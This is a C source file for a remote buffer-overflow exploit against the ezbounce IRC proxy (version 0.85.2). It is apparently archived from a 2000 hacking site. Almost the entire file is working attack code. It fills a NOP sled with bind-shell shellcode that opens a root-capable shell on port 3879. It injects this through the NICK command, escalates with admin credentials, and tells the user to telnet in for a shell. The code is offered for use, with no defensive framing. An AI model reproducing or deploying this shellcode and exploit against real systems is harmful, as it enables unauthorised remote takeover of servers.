home *** CD-ROM | disk | FTP | other *** search
- /* ezbounce version (0.85.2 and probably others) exploit by sectorx
- * mad thanks to duke for helping me with the segment probe code :)
- * I included the offset of RedHat 6.0's RPM, feel free to report me of
- * any other offsets of precompiled binaries.
- *
- * PRIVATE! DO NOT DISTRIBUTE!!
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <fcntl.h>
- #include <stdarg.h>
- #include <time.h>
- #include <sys/time.h>
-
- #define MAX 4096
- #define TIMEOUT 1
- #define SIZE 400
- #define TOP 310
- #define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */
-
- /* bind a shell on port 3879 by lamagra */
- char shellcode[]=
- "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
- "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
- "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
- "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
- "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
- "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
- "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
- "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
-
- int Connect(int ip, int port)
- {
- int fd;
- struct sockaddr_in a;
-
- fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- if (fd<0) return -1;
- a.sin_family = AF_INET;
- a.sin_port = htons(port);
- a.sin_addr.s_addr = ip;
- if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1;
- return fd;
- }
-
- int sprint(int fd, const char *str, ...)
- {
- va_list args;
- char buf[MAX];
-
- va_start(args,str);
- vsnprintf(buf,MAX,str,args);
- printf("-> %s",buf);
- return(write(fd,buf,strlen(buf)));
- }
-
- int Datawatch(int fd, int sec)
- {
- fd_set fds;
- struct timeval tv;
-
- tv.tv_sec = sec;
- tv.tv_usec = 0;
- FD_ZERO(&fds);
- FD_SET(fd,&fds);
- if (select(fd+1,&fds,NULL,NULL,&tv)) return 1;
- return 0;
- }
-
- int Get(int fd, char *grep)
- {
- char buf[MAX];
- int ret=0;
-
- while (Datawatch(fd,TIMEOUT)>0) {
- memset(&buf,0,sizeof(buf));
- read(fd,&buf,sizeof(buf));
- if (strstr(buf,grep)) ++ret;
- }
- return ret;
- }
-
- int main(int argc, char *argv[])
- {
- int i,fd;
- char buf[SIZE];
-
- printf("ezbounce remote exploit by sectorx of xor\n");
- if (argc<6) {
- printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n",argv[0]);
- return;
- }
-
- memset(&buf,0x90,sizeof(buf));
- for (i=TOP+2;i<SIZE-4;i+=4) *(long*)&buf[i] = ADDR;
- memcpy(buf+(TOP-sizeof(shellcode)-1),shellcode,sizeof(shellcode));
- buf[TOP-2] = 0x90;
- buf[SIZE-1] = '\0';
-
- fd = Connect(inet_addr(argv[1]),atoi(argv[2]));
- if (fd<0) {
- perror("Connect ");
- return;
- }
- sprint(fd,"USER xor\n");
- sprint(fd,"NICK %s\n",buf);
- sprint(fd,"PASS %s\n",argv[3]);
- Get(fd,"NOTICE");
- sprint(fd,"ADMIN %s %s\n",argv[4],argv[5]);
- if (Get(fd,"granted")==0) {
- printf("** Error: i was unable to gain administrative privilages using provided l/p\naborting.\n");
- goto end;
- }
- sprint(fd,"WRITE all a\n");
- printf("Code sent! telnet to port 3879 for shell\n");
- end: ;
- close(fd);
- }
- /* www.hack.co.za [28 September 2000]*/
